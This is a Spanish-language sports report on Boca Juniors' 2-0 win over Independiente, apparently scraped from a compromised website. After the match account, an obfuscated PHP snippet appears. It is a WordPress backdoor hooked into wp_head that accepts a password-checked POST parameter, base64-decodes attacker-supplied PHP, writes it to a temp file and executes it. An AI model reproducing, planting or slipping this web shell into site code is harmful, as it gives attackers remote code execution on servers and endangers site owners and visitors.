Boca Juniors extendió su racha ganadora ante un Independiente que sigue complicado en la tabla

Boca Juniors venció a Independiente 2-0, en el estadio Libertadores de América – Ricardo Enrique Bochini, por la fecha 27 del campeonato de la Liga Profesional. Exequiel Zeballos y Nicolás Valentini anotaron los goles del equipo de Jorge Almirón, que logró su cuarto triunfo consecutivo. El local sigue complicado por su posición en la tabla anual que definirá un descenso a fin de año.

Independiente fue superior durante el primer tiempo. Con una buena y agresiva producción, le causó varios sobresaltos a la defensa de Boca. Braian Martínez era factor de desequilibrio y peligro, entre sus acciones destacadas hubo un remate bajo que salió cerca y otro que motivó una buena respuesta del seguro Sergio Romero.

Bajó la intensidad en el segundo tiempo el equipo de Ricardo Zielinski y Boca mejoró con el ingreso del Changuito Zeballos, quien sería vital en el triunfo ya que participó en ambos goles de su equipo. También sería clave Chiquito Romero, redondeado su gran actuación.

Una excelente jugada personal, a puro control y lujo, de Frank Fabra por la izquierda, desembocó en el pase al centro del área para la conquista de Zeballos, que atropelló y empujó la pelota al gol, a los 26 minutos.

Apenas dos minutos después, Independiente dispuso de una gran oportunidad para igualar. Remató Ayrton Costa y Darío Benedetto desde el piso desvió la penal con la mano. Clarísimo penal. Lo pateó Martín Cauteruccio y su lució Sergio Romero atajándolo.

Ese final activo y frenético culminó con un tumulto, plagado de empujones e insultos, entre jugadores de ambos equipos. Pero no pasó a mayores y todo quedó en unos instantes calientes.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}